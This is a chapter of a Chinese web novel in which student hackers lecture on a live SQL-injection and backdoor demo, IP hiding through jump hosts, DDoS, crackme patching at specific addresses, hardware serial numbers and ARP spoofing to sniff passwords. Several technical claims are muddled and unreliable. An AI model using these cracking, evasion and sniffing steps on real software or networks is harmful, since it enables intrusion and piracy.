“后门程序放上去了,现在我们只要知道这个后门程序在对方服务器上的具体位置,就可以利用数据库的权限,或者是其他手段来运行它!”危险漫步没有解释要用什么手段来确认这个后门程序的具体位置,而是直接用自己的方法运行了它。他打开后门的连接程序,输入那台服务器的ip地址后,很快就得到了一个黑乎乎的窗口,没有图像显示,但可以输入各种命令。危险漫步输入一个最简单的dos命令,是用来显示自身ip地址的命令。

显示出来的ip地址跟那台服务器的地址是一致的,这就证明,危险漫步已经进入了那台服务器,并且拿到了很大的权限。

危险漫步又输入了几个命令,把显示出来的结果,和自己电脑上的情况做了对比,确认这是两台不一样电脑上的内容。当然,危险漫步还有更直接一点的方法,他直接敲入命令,让那台服务器直接重启,很快,后门程序就失去了连接,再输入刚才bbs的链接,也提示无法找到服务器。现场的人虽然不懂黑客,但也知道危险漫步确实是入侵成功了。

“就因为架设在服务器上论坛程序上的一个小小bug,便导致了整台服务器被人控制,现在我们再回过头,来看看这到底是个多大的漏洞!”危险漫步笑呵呵地看着会场的人,过了会儿,笑着说,“我们看看那台服务器重启结束没有!”

危险漫步重新输入论坛的网址,这次论坛又显示出来了,看来服务器又正常工作了,“我们报告会的主题是网络安全,刚才的入侵,只是为了告诉大家安全有多么的重要。怎样能让自己的电脑绝对安全,这才是我要讲的重点。可能现场的很多同学都会有些疑问,说看你刚才的入侵,好像也不太麻烦,那防范入侵会不会也很简单呢?

“其实这样的想法一点都没错,安全比入侵要简单得多,安全在于平时的一点一滴,这些都是可以养成习惯来做到的;而入侵却需要极不寻常的灵感,以及成千上万次的试验,这不是每个人都能做到的。”

危险漫步似乎是怕众人不相信,接着重新又演示了一下1=1和1=2的问题,网页和刚才的显示一样,一次正常显示,一次提示错误。“现在,就请大家看看我是怎么来修复这个漏洞的!”

危险漫步再次用后门联接到那台服务器,找到论坛程序的源代码文件,打开了,却只修改了一句,现场的人看得很清楚,他就是往里面添加了几个字符。但奇迹就发生了,危险漫步保存了论坛的代码文件后,他重新再打开论坛,这次不管是1=1,还是1=2,网页统统都显示正常了。

“网页全都显示正常,你还能得到什么信息呢?”危险漫步笑着问大家。

众人惊讶的看着他,就这几个字符,漏洞就瞬间消失了,这下入侵的人就要傻眼了,别说是admin,你就是问管理员的账号是不是“白痴”“弱智”“狗屎”,网页同样都会显示正常。

“当然,我还可以这样修改!”危险漫步又打开那个源文件,删掉刚才添加进入的字符,往下顺了几行代码,往那里插进了一个符号。这次更神奇,等他保存好,再去进行sql注入,不管是1=1,还是1=2,网页全都提示错误,只有输入正确的网址,不在网址后面添加任何多余的语句,网页才会正常显示。

“大家看到了吧,安全不安全,就在于你多写或少写几个字符而已!”危险漫步露出笑容,“所以,我们才经常说:安全与不安全之间,只隔了一个字母!”

字母两个字还没说完,底下的人纷纷站起来鼓掌。支持人走了过来,学生们见到主持人,齐声呼叫:“再讲些——再讲些——”

主持人见这般架势,也不好硬说什么,低声询问还准没备准备其他材料。他没想到今天的报告会观众会这么热情,前几个系还没讲完,人已经走了大半。

危险漫步对主持人说可以,虽然自己并没有特意再准备,不过临场发挥再讲一会儿还是没问题的。

危险漫步轻咳两声,阶梯教室里瞬间安静了下来,危险漫步:“随着互联网事业的蓬勃发展,越来越多的网站像雨后春笋一样拔地而起。正因为如此每天都会上演着越来越多的网络攻防战。而在这其中最出色我想就是网络渗透攻击。接下来我就来和大家扒一扒黑客之间的“网络渗透攻击”。

“先来和大家说一说网络渗透攻击是什么。

“为了自己网络空间的安全,站长或者网络管理员们一般都会把网络结构进行严格规划,把内部网络与外部网络进行隔离,设置网络防火墙,安装杀毒软件,并且做好各种各样的安全保护措施。然后这些只是基础的保护措施,想要通过这些措施使自己的网络处于绝对是不可能的。逃避安全检测系统,以及通过伪装偷袭的方式绕过安全系统进入系统是大有可行的,绝对的安全是不存在的,漏洞与危险总是会存在的。

“黑客的渗透攻击的可以总结分为三个阶段:

“1.预攻击阶段

“预攻击阶段是黑客对攻击目标相关信息进行收集和整理的阶段,也就是我们常说的黑客踩点。黑客通过多重方式进行信息收集,可以比较全面地了解被攻击目标的信息,并分析可能存在的安全问题,方便在攻击阶段实现目的明确的攻击测试,提高渗透攻击的成功率。

“2. 攻击阶段

“攻击阶段是黑客对攻击目标渗透过程的核心阶段,也是利用预攻击阶段收集到的信息实施黑客攻击的主要过程。通过预攻击阶段的信息收集和攻击阶段中渗透攻击的实施,黑客往往可以获取到目标环境的普通用户权限,如获取到网站的webshell或者获取目标主机反弹的cmdshell。黑客会通过该普通用户权限进一步收集目标系统信息,寻找可能存在的权限提升的机会,进而实现最高权限的获取。

“3. 后攻击阶段

“后攻击阶段是黑客对攻击战果进一步扩大,以及尽可能隐藏自身痕迹的过程。黑客通过内网渗透、嗅探攻击、口令破解或者安装特洛伊木马或病毒等方式实现该过程,实现对目标环境中内网敏感数据信息的获取,并在目标环境中留下隐藏的后门,以方便日后获取更多的数据信息。

“网络渗透攻击是指对大型网络主机服务系统服务器采用一种迂回渐进的攻击方式,通过长期有计划的逐步渗透攻击进入网络,最终完全的控制他所入侵的整个网络。

“网络渗透攻击能够成功的最主要原因就是因为,网络上总是会有一些大大小小的安全缺陷,或者漏洞。黑客就是通过自己敏锐观察力,发现这些缺口。并且利用这些被发现的小缺口,通过自己的专业技能一步一步的,把这些小缺口、小漏洞逐渐的扩大、扩大、在扩大,当这些漏洞足够大的时候,黑客就可以使你的整个网络安全防线全部失守,并且掌握整个网络的权限。因此,作为网络管理员是非常有必要了解和掌握网络渗透入侵技术的。这样才能有针对性的进行防御,从而保障自己网络空间的真正安全。如果你对网络渗透入侵技术还不是足够的了解的话,你也可以防火墙加密的方式,使自己的防御更加的坚固。

“最后,我教大家一个小技巧——隐藏自己的IP。在黑客界,有一句话叫无论如何也不能让对方知道自己的IP,他们常常会以各种方式隐藏和伪装,最典型的例子就是跳板。比如说要攻击一台机子,假定它是a,为了不暴露自己,高手一般都会先登录到b这台机子上,再从b登录c,从c到d,如此跳转很多次,最后可能是在x,或者y这台机子上,发动攻击,入侵a。理论上讲,使用的跳板越多,这个链越长,攻击的人就会越安全。但受到网速以及效率的影响,这个链并不能无限制地长,一般两三个跳板就够用了。所以真正的高手,非常重视跳板的选择,跳板也不一定非要是一台电脑,高手会在跳板中加入一台路由器或者交换机,你们知道是为什么么?”

底下一片摇头,有人怯生生地问,难道路由器也可以入侵么?

“因为路由器上的日志,一旦被清除,就不能再恢复了,而电脑上的日志被清理后,也还是有办法恢复的。

“但是跳板一般需要肉鸡,当我们的技术不够,又想要隐藏自己的IP,怎么办呢?

“一般隐藏IP的手段就是使用代理服务器,但是很多时候不便于使用代理服务器,比如NBS12就根本没有代理服务器的相关设置,而是一定要使用NBSI进行注入则是要冒着风险的。

“目前国内互联网络主要分为两大ISP运营:中国网通和中国电信。当用户使用中国网通的线路时,访问网通上的各类网站,游戏服务器等速度正常,访问中国电信网络上的各类服务器时,速度异常缓慢,甚至根本访问不了,使用中国电信的线路也同样存在这样互相交叉分工的问题。此类问题主要是由于中国网通和电信两个ISP网络之间的联通互通不够通畅,带宽比较狭小,无法满足两大网络之间的互相访问需求。因此网上出现了很多,为了满足玩家对网游速度需求而开发出实现网通电信交互访问无障碍的软件。我们只需要找到一个类似于这样的软件,并且进行安装,之后登录他们的服务系统。并且把用户名和密码使用为默认用户名和密码,这个时候我们再打开www.ip138.com来查看我们的IP。我们就发现自己的IP,变成了我们所等我服务器的出口IP,而且IP的归属地也会显示是服务器的端口。也就是这个软件开发者所在的地区。

“当然,仅仅知道这个软件可以做什么是不够的,接下来我们来探寻一下这个软件的原理,其实这就是一个拨号程序,通过拨号程序可以拨入服务器所在的VPN,然后统一使用这个VPN来访问其他网站。也就是说,通过本机访问任何网络,都是向你登陆的软件的出口的服务器发送请求,并由此服务器负责到目标网站取回相应内容,然后传送给客户,因此相当于我们使用了代理服务器的访问网络。

“接下来我再和大家简单介绍一下什么是VPN。VPN其实就是虚拟专用器,顾名思义,虚拟专用网络,我们可以把它理解成是虚拟出来的企业内部专线。它可以通过特殊的加密通讯协议连接在lnternet上的位于不同地方的两个或多个企业内部网之间,建立一条专有的通讯线路,就好比是架设了一条专线一样。但是它并不需要真正的去铺设光缆之类的物理线路,这就好比去电信局申请专线,但是不给铺设线路的费用,也不用购买路由器等硬件设施。VPN技术员是路由器具有的重要技术之一,目前在交换机防火墙设备等都支持VPN功能。一句话总结就是,VNP核心就是利用公共网络建立虚拟私有网。”

危险漫步讲完,观众又齐声欢呼,主持人上来,他独自走下后台。虽然这次效果达到了,但是这样的方式不是自己的初衷。他并不愿意做一个抛头露面者。这下字以后走在校园里,偶尔会被认出来的,早知这样就叫林雨生来了。

商学院绿化的覆盖率在国内的大学中排名前三,弄弄的绿色气息,感觉一点都现代化。不过,危险漫步很喜欢这种绿树阴浓的感觉。

几天之后,危险漫步“愿望”达成——报告会评价最高的三个专业,校方决定增设一场,计算机也在其中。危险漫步不愿再出风头,这次上去演讲的人是林雨生。

林雨生准备了六个话题演讲,分别是DDOS、HiJackFree、爆破、ARP欺骗、安全的批处理、CPU序列号。

“有很多黑客初学者学了很长时间的黑客技术,他们大都搞定了不少大大小小的网站,考官木马也控制了不少个人肉鸡网站。可是总是有一些网站他们攻击不下来。其实很正常,就像前些天有人问我,他说扫描了一家网站的ip地址,开了挺多的端口,可是却没有发现漏洞,问我可不可以帮到他。

“其实对于这种几乎没有任何漏洞的个人用户,如果想进入的话也并不是很难,接下来我就以此为例,和大家详细地说一说。这次我教大家使用一个叫做拒绝服务攻击的方法,可以让他的电脑死机甚至重启。这个技术利用起来非常的简单,防范起来却非常的困难。

“DOS是英文拒绝服务的缩写,Dos操作系统,相信很多人都有一定的了解。

“DOS最常用的手法是,SYN Flood这是属于当前网络协议的缺陷,只要你提供服务打开了某个端口,那么你就可以通过DOS入侵他的电脑。

 “因此只要对方打开了一个TCP端口,那么我们就可以使用SYN Flood对他进行攻击。

“DDOS的攻击原理就是,黑客通过扫描发现对方打开的tcp端口,然后不断访问被攻击者,直到耗光被攻击者的宽带资源,由于这种攻击是采用SYN Flood所以攻击威力会非常的大,而且防范起来也非常的困难。这其实也就是僵尸网络的雏形。

“由于他的攻击性非常容易甚至于随便一个普通人都能使用它,而防范性却非常的困难,所以关于这方面的工具,我就不公布了。在这里,我们主要是探讨技术。现在我来跟大家说一下它的几种攻击方式,第一种是IGMP攻击,这种攻击可以直接让系统蓝屏,属于数据炸弹式攻击。第二种,UDP攻击,这种攻击只需要你填入被攻击者的ip地址,点击开始攻击就可以了,攻击者的电脑会自动的打开大量网页,而且不能关闭,即使是重启电脑也不能解决问题。如果你控制了几台傀儡电脑,那么攻击力都将会变得更加的大,会让对方直接有想砸电脑的冲动。还有一种是,根据,UDP攻击衍生出来的,集体下载功能,能够让被攻击者的电脑,开启自动下载。被攻击者的电脑,会一直不停的下载文件,直到他的硬盘储存满了为止。

“这些就是DDOS的野蛮武力攻击,破解的方法只有将系统内所有文件格式化并重装系统。

“在网络日益普遍的今天,各种间谍软件也在以惊人的速度更新着,不是有一句古话说的好吗?常在河边走,哪有不湿鞋,对于上网的朋友们来说,计算机难免会中个病毒、木马或者是间谍软件什么的,但是如果要是真的中了间谍软件,我们就得必须有一个非常好的辅助工具来彻底清除它们,否则的话就会野火烧不尽,春风吹又生。

“大家常见的反间谍软件有冰刃、微点主动防御等等,不过我今天要说的不是这个,我要带大家认识一款更加强大的反间谍工具——HiJackFree。

“我们打开HiJackFree,它的主界面十分人性化,当然从界面中我们也可以看到HiJackFree有查看进程、端口、自动运行和服务管理等功能。那么我们先来看一下进程吧!在这里除了同类软件都有的管理进程和加载模块外,同时还增加了进程过滤和显示进程细节这两个功能。在进程过滤中有过滤被微软信任的文件、过滤所有可信任的软件和过滤所有有签名的文件。在进程细节中我们也可以知道这个进程是否自动运行和是否打开TCP/UDP端口等详细信息。

“在端口选项中我们可以知道系统中打开的端口和打开端口文件的详细信息,和上面的一样,这里同样也有一个过滤功能。

“自动运行可以说是HiJackFree功能中比较强大的一项了,它能够浏览和设置所有的自动运行程序,显示超过五十种不同位置的自动运行程序和当前用户或所有用户默认的注册表启动程序。HiJackFree也支持类似Win.ni、system.ini、autoexec.bat和config.sys类似的文件。在复杂的启动这一小项中我们可以看到那些启动的地方相信在同类软件中都是很少见到的对吧!我如果借用软件介绍里面的话来说,这款软件对于启动项目的检测,几乎涵盖了Autoruns这款Sysinternals出品的启动项目管理工具的所有功能,并且HiJackFree特有的过滤功能还可以帮助我们管理所有加载项的安全性,这一点对于我们更有利于对间谍程序、恶意软件的手动清理。

“那么接下来我们看一下服务管理项,这里除了系统服务管理外,还包括了所有以服务形式加载的启动项管理,选中启动项后,我们要点一下鼠标右键,在弹出的菜单里可以卸载服务和安装新的服务,同样软件也提供了服务的详细信息作为大家的参考,总的来说还是不错的。

“HiJackFree的其他选项里包括了浏览器加载项管理、LSP协议管理、Host文件管理和ActiveX管理。其中浏览器加载项管理中还有IE工具栏、外壳扩展、外壳钩子、BHOs和ActiveX项目。其中IE工具栏、BHOs、ActiveX和同类软件的功能都差不多,可以直接清理掉我们不需要的IE插件。外壳扩展和外壳钩子这两个功能可是同类软件中很难见到的,我个人认为外壳扩展这个功能比较实用,可以看到的浏览器加载项目是很全面的,并且里面有很多都是在BHOs和ActiveX里面看不到的。当然了,间谍软件和恶意程序的加载项在这里也会暴露无遗,通过右键菜单可以直接对其进行清理。

“LSP界面中可以显示所有LSP类型的网络驱动安装,一些木马或间谍软件会利用LSPS寄存在内存中,从而会影响所有的网络行为,更可怕的是甚至会令我们的网络瘫痪。我们通过LSP协议管理清除掉这些恶意程序,并且软件本身也提供了过滤功能,很大程度上也方便了不熟悉的用户进行清理。

“Host文件相信各位也都知道吧!我们可以利用Hosts重新设置本地网络服务器名称来消除主页类的ADS。另外一个特征就是蠕虫病毒可以利用Hosts文件改变杀毒软件对网络的请求,在这里是为了避免被清除。Host文件管理可以直接对Host文件进行编辑。

“现在就轮到ActiveX管理了,大家可能都会碰到过这种情况,在浏览某网站的时候,上面的信息栏弹出提示说我们需要安装XXActiveX控件,如果我们不注意的话,恶意的ActiveX对象就会在我们的电脑里安家落户了。那么我们该如何清理掉它们呢!HiJackFree的ActiveX管理项可以帮助我们分析这些Active对象,右键菜单可以直接卸载和安装ActiveX对象。

“在这个木马病毒日益猖狂的今天,HiJackFree的强大功能是否能让我们的眼前一亮呢?其实HiJackFree的功能还有很多,在这里我就不一一向大家介绍了,有兴趣的朋友可以自己去挖掘。

“因为我对软件破解感兴趣,也因为自己对汇编有一点点的基础,冒冒失失的就闯过了几十次crackme的破解,便开始享受破解的乐趣了。那么今天我就以破解为实例的形式来给大家谈一下常见的几种爆破方法,也算是我对所学知识的一个总结吧。

“我们要破解的是ekh crackme 1.0。首先我们要运行这个程序,程序界面是很简单的,有username和serial的输入框,另外还有一个ok按钮,可编辑的控件就这么几个。那么我们随便输入一个用户名和密码,点击ok按钮,就会弹出一个错误提示窗口(后来查看代马证实它是一个标准的msgbox)。

“当然为了确保它没有加壳,我们还是先用peid检查一下吧,没有加壳,当然这对我们来说是一个好消息,程序是使用delphi 3.0编写的。好了,这一下该ollydbg登场的时候了。我们使用od打开ekh,在代码区域使用右键打开功能列表,选择“ultra string reference?find ascll”,其实的话,对于这个程序使用find ascll和find unicode也都是可以的,但是有的程序只支持一种编码方式。我们在打开的ultra string reference界面内找到刚才注册错误提示框中的内容“wrong serial number!”。

“我们在该行代码区域上双击回到代码界面,就会定位到读入该数据的代码位置了。上面的工作主要是定位关键代码,也就是破解中常常提到的关键跳的位置。接下来就是我们要说的主要内容——如何爆破掉它!

“通过注释,我们可以看出有以下几种改法(在地址00427b73之后的修改,修改一处我就可以完成爆破):

“1.修改00427b73处代码为反义跳转,就是jge short 00427ba5;

“2.修改00427b73处的跳转地址,就是jge short 00427b73,让自己的程序在出错信息错误时提示注册正确,或干脆改为jmp short 00427bc3,好像有点强硬;

“3.同理我们在00427ba3处的代码也可以按以上两种方法改为jge short 00427bc3或者是jmp short 00427bc3,或者是jl short 00427bc5。

“上面的几种修改方法就是比较经典的修改关键跳的方法,那么我接下来再带大家来看看00427b99,00427b9e,00427ba3这几句注册信息认证的步骤,我们在调用注册信息认证函数后,程序检查了exa中的值是否大于等于0bc614e这个值,来决定注册的成功与否,因此我们可以有以下几种修改方法:

“1.修改00427b9e处的比较语句,只要能符合下面的跳转条件就可以了,比如cmp 1.0或者是cmp eax.eax等;

“2.修改00427ba3处的跳转,同样的改法jl/jmp short 00427bc3;

“3.修改00427b99处的函数调用语句,直接给eax填个值就行,填写一个大于等于0bc614的十六进制数就行了,比如改为mov eax,0bc614e,对这个程序这么修改是没有问题的,但是需要提醒大家一句,这种修改方法并不可取,因为很多程序可能会在注册函数中写注册表,本地软件或网络认证等,这么改认证是过去了,但是整个系统的注册状态很可能还是没有发生改变。

“既然已经知道了认证函数的地址,那么我们直接去看看不就行了?其实这个认证函数并不是太复杂,我们要有耐心的话,还是会希望读者能够仔细读下来,对以后的破解学习会有好处的。我们直接写个注册机也是可以的,但是这个不是我们今天的主题,我们还是来看一看如何爆破吧!代码位置已经是注册函数的末尾了,这就是爆破点,当然我们也有几种改法:

“1.修改00427b01处代码为jz short 00427b0a或是jnz short 00427b03,当然还可以利用nop毙掉它;

“2.我们将注册不成功时填的返回值改为成功的值,就是修改00427b0a处代码为mov ebx.0bc614e。

“到这里,我们的爆破方法就已经描述完了,我们再来整理一下思路:程序试探-寻找爆破点-修改关键跳存盘。这个程序的注册方法爆破起来应该是比较容易的,但是通过细致的分析尽可能地读懂流程,可以更好地熟悉各种编译器生成代码的规律。我再来啰嗦两句保存修改的方法:在代码界面内修改完毕后,点鼠标右键,选择复制到可执行文件-所有修改,在弹出的对话框上点全部复制,在新增的界面内点鼠标右键,选择保存文件填写好文件名就可以了。

“前几天危险漫步在这里讲到了安全,对于使用计算机的我们来说,安全的确是最不能忽视的一点。目前很多用户的电脑中除了安装杀毒软件外,还都会使用一些安全辅助工具,虽然这些安全工具非常实用,不过这也使得很多人忘记了系统中那些自带的小程序,今天我就为大家介绍一款安全小工具,它完全是利用批处理语句编写和封装的,该工具全部使用了Windows自带的系统命令来进行工作,因此无论是兼容性还是可靠性都要大大的优于其它工具。

“首先我们从网上下载这款批处理版本的系统安全工具,由于它是一款绿色版软件,因此解压后就可以直接使用了。如果是第一次使用该软件的话,那么在运行后程序会进行初始化的操作,同时也会对工具自身的完整性进行一次检测,这样做完全是为了避免工具被人恶意的进行修改。所有的准备工作完成后,根据程序操作界面的提示我们接任意键继续,这时就可以看到程序的一个说明窗口,提示用户程序可以在紧急情况或安全软件无法运行时,对Windows系统进行相应的修复操作。

“接下来同样是按任意键,这时程序就会构建一个安全环境,这样可以避免病毒驻留系统。根据提示按下键盘上的Y键,程序就会自动的关闭除了系统进程外的所有进程,从而自动完成对安全环境的构建操作。这样也为用户创建了一个比较好的系统检测环境,可以避免其它软件的干扰。现在我们就可以看到工具的功能列表了,其中包括了快速扫描、注册表扫描、启动项扫描、病毒免疫等。

“我们按下键盘上的A键,程序就会对系统进行扫描,默认情况下它可以分析出245种病毒,使用的是MD5信息对比的方式来进行的分析。如果我们愿意的话,也可以自己通过网络收集一些病毒文件的MD5信息,将其复制添加到程序释放出来的vm.data文件中。程序一旦发现了病毒就会自动进行清除,如果没有的话就可以接任意键返回到主界面中了。

“我们再来看看注册表扫描,按下键盘上的B键,程序就开始对注册表进行扫描了。现在的很多病毒都会使用修改注册表的方法来破解系统默认的相关设置,我们使用工具的注册表扫描功能就可以发现注册表被修改的地方,一旦发现了被篡改的信息,程序就会自动对其进行修复操作。扫描分析完成后,按任意键就可以看到扫描结果了,包括发现了多少处存在异常,已经成功修复了多少处的异常等等。如果出现了修复失败的内容,那我们就得考虑使用其它安全工具来进行修复了。

“接下来我们看看工具的病毒免疫功能,按下键盘上的D键,程序就会对系统进行病毒免疫操作了。程序通过畸形文件夹和访问控制列表这两种方式来达到免疫计算机病毒的作用。当我们在该功能界面中按下任意键进行病毒免疫后,程序首先会对系统进行检测,查看是否已经免疫,如果没有的话就会自动进行免疫操作。这里需要说明的是,程序只可以对某些病毒进行免疫,而不是对所有的计算机病毒进行免疫操作。在免疫完成后可以按任意键返回到主界面中。

“最后我们再来看看“系统关键位置文件快照”,按下键盘中的E键进入到操作界面,如果是第一次使用这个功能的话,程序会要求我们先创建一个标准记录,以便以后和这个记录文件进行对比。按下键盘中的2来创建一个标准文件,以后要进行对比的的话就按下键盘中的1,这时工具就可以将此时的文件信息和标准文件进行对比了,对比完成后就会将有差异的文件显示到一个文本文件中。

“除了上面介绍的这些功能外,我们还可以进行启动项的扫描以及安全模式的修复,但是该工具只可以对注册表启动项进行扫描,并且不能对启动项中的信息进行删除操作。目前有很多比较厉害的病毒也会对系统的安全模式进行破坏,从而避免用户在安全模式中对其进行清除,对于这种情况,我们就可以通过“修复系统安全模式”功能来快速有效的对安全模式进行修复操作了。

“最近,我的一个群里有人讨论起了把硬盘以及CPU序列号用于加密方面的话题,虽然以前也曾听到过类似的讨论,但我还是听的一头雾水,于是就从网上寻找了大量的相关资料,并对其进行了整理,希望能对大家有所帮助。

“和硬盘序列号相关的概念有三个,分别是硬盘商标号、硬盘序列号、驱动器序列号,当然要想将序列号用于加密,那我们首先就得知道如何获得序列号,最好的方法就是对类似功能的软件进行分析,本文我们就以磁盘序列号修改器为例来进行简单的分析以区分以上的概念。

“1、区分硬盘商标号

“我们在购买硬盘时,硬盘上都会有一个商标号,不同厂商的硬盘商标号是不一样的,对于加密来讲这个号码没有任何的意义,只是为了区分下面将要介绍的两个号码而已。以我的电脑为例,在“开始”——“运行”栏中输入compmgmt.msc打开计算机管理程序,单击“磁盘管理”,在右侧的磁盘0上点击右键并选择“属性”,在“常规”选项中我们看到的字符就是硬盘的商标号——WD1200BEVS-22UST0。

“WD就表示为西部数据公司提供的硬盘,1200表示我的硬盘容量为120G,而后面的B表示转速为7200 RPM/分,这里我简单的介绍了一下商标号里面的意思,不同厂商的硬盘都有不同的描述方式,这些我们可以从网上来获得更多的相关信息!

“2、硬盘序列号(Disk Serial Number)

“硬盘序列号又称为Disk Serial Number,它具体唯一性和只读性,所以被广泛的应用于加密领域,对于硬盘序列号的获取,我们可以先通过CreateFile()打开物理设备,然后使用DeviceControl函数向打开的设备发送指定命令进行通信,根据返回的SENDCMDOUTPARAMS结构来得到物理序列号和模型号。

“我们以磁盘序列号修改器为例来进行说明,程序本身加了aspack壳,可以使用ESP定律把壳脱掉,未注册版本无法修改驱动器的序列号,只要将字符串参考上面的两个跳转修改为相反的指令就可以破解了,对于这个程序的破解没有什么好说的,我们主要来看它是如何调用函数的。

“将脱壳后的程序载人到OD中,然后使用“bp CreateFileA”下int 3断点,按F9运行程序,断下来后观察堆栈区的函数调用过程,也就是说我们需要的代码。

“PysicafDrive后面的0表示的是硬盘号,它的范围为0-255,不过一般用于计算注册码的时候只要有一个硬盘就完全可以了,更何况现在没有硬盘而只有内存的计算机也实在是太少了。接下来我们按F2取消断点,按ALT+F9返回程序领空,再按F8单步走,不一会儿就发现了代码。这是第二个函数DeviceControl的用法,我们观察堆栈窗口,有些参数可以直接照抄过去,这是我学习的时候所使用的方法,可能比较笨,但是对于不太会用的API函数,与其查看全英文的MSDN,倒不如在OD中查看调用过程来的更实在,这可能也算是逆向的意义吧。

“因为对硬盘的I/O操作是一种底层操作,所以需要Windows驱动开发环境中的一些数据结构,这里就不再赘述了,缩写好的程序及源码已经打包收录了,程序在WindowsXP SP3+VC6.0中编译通过,运行后大家仔细看一下,会发现硬盘商标号和序列号是完全不一样的。

“3、驱动器序列号(Volume Serial Number)

“驱动器序列号又称为Volume Serial Number(卷标号),这个号码是当我们进行硬盘格式化时随机生成的一个号码,它具有可修改性,但是绝大多数情况下当我们安装完Windows后就很少再对硬盘进行格式化操作了,所以它还是有一定的可取之处,同时获得驱动器号的方法也比较简单,只要调用GetVolumelnformation()就可以了,所以很多时候我们碰到的一般软件都可以使用这种方法来计算注册码,因此像磁盘序列号修改器类似的程序便有了生存空间。

“将脱壳后的磁盘序列号修改器载入到OD中,在GetVolumelnformation下int 3断点,查看堆栈区,函数调用的情况。

“经过上面的介绍,相信大家对于那些基本硬盘序列号来计算注册码的软件要如何获得号码都已经有所了解了。

“二、CPU序列号。

“CPU序列号是一个建立在处理器内部的、唯一的、不能修改的编号,它由96位全数字组成,正是因为其具有唯一性,所以很多时候也被用于计算注册码。

“1、CPU序列号与CPUID

“CPU序列号的唯一性体现在96位中的低64位,每一个CPU的都不相同,而高32位则称为CPU ID,用来识别CPU类型,它们的区别是必须要搞清楚的,前者每一个CPU都唯一,而后者相同系列的CPU则是一样,即CPU ID并不具备唯一性,CPU序列号包含了CPUID,同上的一些介绍资料不是描述的不详细就是写的不严谨,直接导致读者陷入了理解的误区。

“2、CPUID指令与MSR寄存器

“为了得到CPU序列号,Intel专门加入了一个CPUID指令,CPUID指令是一个类似函数调用的指令,通过eax传递相应的参数,关于CPUID待会儿我会作更详细的说明,至于MSR寄存器,确切的更应该称为MSR寄存器组,它有很多个,CPU通过MSR寄存器ID来识别,这个ID是通过ECX作为参数进行传递的,MSR寄存器中保存有CPU的一些特性数据,同时MSR寄存器也并不是目前所有的CPU都支持的,也就是说并不是IA32架构下的CPU必备的一个寄存器。为了更好的操作MSR寄存器,Intel加入了rdmsr(read msr)读MSR指令和wrmsr(write msr)写MSR指令,要想使用rdmsr和wrmsr操作MSR寄存器中的MSR位,首先需要任务运行在ring0级下,然后将ECX设置为读寄存器的ID,如果是读操作,EDX和ECX中保存有读到的内容,如果是写操作,需要在EDX和ECX中保存相应的数据。

“3、CPUID指令与CPU信息获得

“CPUID是一个比较复杂的命令,在早期intel的CPU中并不存在,要想知道一个系统的CPU是否支持该命令,可以通过查看EFLAGS中的第21位,如果为l就表示支持,如果为0就表示并不支持。

“向eax中传递0参数,可以得到CPU的商标号——就是哪个生产厂家,返回的信息将依次保存在EBX、EDX、ECX中。同时因为Intel的CPU是little endian的排序,所以我们看到的EBX、EDX、ECX的信息应该倒着读——\x47\x65\x6e\x75\x69\x6e\x65\x49\x6e\x74\x65\x6c,也就是GenuineIntel的意思。

“向eax中传递1参数,可以得到CPU的型号,返回的信息中eax的值就是当前CPU的型号。当然这个信息并不能完全相信,因为有一些不同型号的CPU也会有相同的签名,这里只是介绍CPUID的一种用法。

“执行这条指令后相信很多朋友得的值都为0,因为从Pentium III处理器后,在引入MSR寄存器后都加入了MSR位,只有MSR=1时才可以读取到CPU序列号,所以我们在读取CPU序列号前需要先对MSR位进行调整。

“最后,我们来聊一下ARP欺骗。

 “ ARP欺骗,主要是发生在局域网中,比如使用同一个路由上网的几台电脑,大学校园内的教育网以及网吧等。通过ARP欺骗,我们能够达到什么目的呢?一句话,所有与网络有联系有交换的数据,几乎都可以被截获,比如游戏的帐号密码,论坛的帐号密码,邮箱登录密码,FTP的登录密码等等。接下来,我就主要介绍一下ARP能够完成欺骗的原因及其工作的原理。大家都知道,连接在Internet上的主机都必须有IP地址,才能够被网上别的主机查找到并进行相互通信。就像我们自己的家一样,必须要有一个明确的、唯一的家庭地址,我们的朋友才能把信件或物品送到我们的家中来。IP地址是一个32位的二进制数,分成了四段,每一段当然是8位二进制数,但是我们使用十进制表示的话,每段就是0-255之间的数字,比如192.168.0.1就是一个IP地址,但是IP地址和主机上的MAC地址(物理地址)不同。MAC地址是固定在硬件上的一个48位二进制数,通常MAC地址被分成了6段,每段8位,使用十六进制表示。比如我电脑上的IP地址与MAC地址情况,其中“OO-EA-01-06-91-72”就是我电脑网卡上独有且固有的MAC地址,这是不会重复的。当我们进行网络通信时,链路层的ARP协议会把IP地址转换为MAC地址,RARP协议会把MAC地址转换为IP地址。在我们的Windows系统下,直接按快捷键WIN+R,在“运行”栏中输入CMD调出命令提示符,然后在命令行下输入“ipconfig /all”,就会得到自己电脑的IP地址与MAC地址了。

“ARP欺骗的工作原理是这样的,我们以主机A( 192.168.0.1)向主机B(192.168.0.2)发送数据为例。当发送数据时,主机A会在自己的ARP缓存表中寻找是否有目标IP地址,如果找到了,也就知道了目标的MAC地址,直接把目标MAC地址写入帧里面发送就可以了;如果在ARP缓存表中没有找到相对应的IP地址,主机A就会在网络上发送一个广播,目标MAC地址是“FF.FF.F F.F F.FFFF”,这表示向同一网段内的所有主机发出这样的询问:“192.168.0.2的MAC地址是什么?”网络上其它主机并不响应这个ARP询问,只有主机B接收到这个帧时,才会向主机A做出这样的回应:“192.168.0.2的MAC地址是bb-bb-bb-bb-bb-bb”。这样,主机A就知道了主机B的MAC地址,它就可以向主机B发送信息了。

“从上面的介绍可以看出,ARP协议的基础就是信任局域网内所有的人,正因为如此,也就很容易实现在以太网上的ARP欺骗了。对目标A进行欺骗,A去Ping主机C却发送到了DD-DD-DD-DD-DD-DD这个地址上,如果在进行欺骗的时候,我们把C的MAC地址欺骗为DD-DD-DD-DD-DD-DD.那么A发送到C上的数据包就都变成发送给D了,这就完成了ARP欺骗。

“以上就是ARP欺骗的原理,简单点说,就是D伪装了一下自己的地址,让自己变成了A要找的目标,让A误以为D就是C.从而把数据发送到了D上而不是直接发送到C那里。其实在真正的工作中,C是一个通道,只是起到了临时停靠的作用,A发送到C的数据还是能到达的,只不过中间都要经过D了,如此一来D作为ARP欺骗的服务端,就完全掌握了A、C之间传递的数据,如此便实现了它想要达到的目的。

“目前各网络安全公司对于嗅探的重视还不是很高,并不能很好的避免嗅探和ARP欺骗。我个人认为,局域网嗅探比较好用工具就是CAEN,可以嗅探局域网的一些3389用户名和密码以及论坛id密码等等。

“关于ARP的启发来自于一次意外之旅,后来我会回去总结总结,便有了今天的压轴。好,十分感谢大家的听讲,谢谢。”

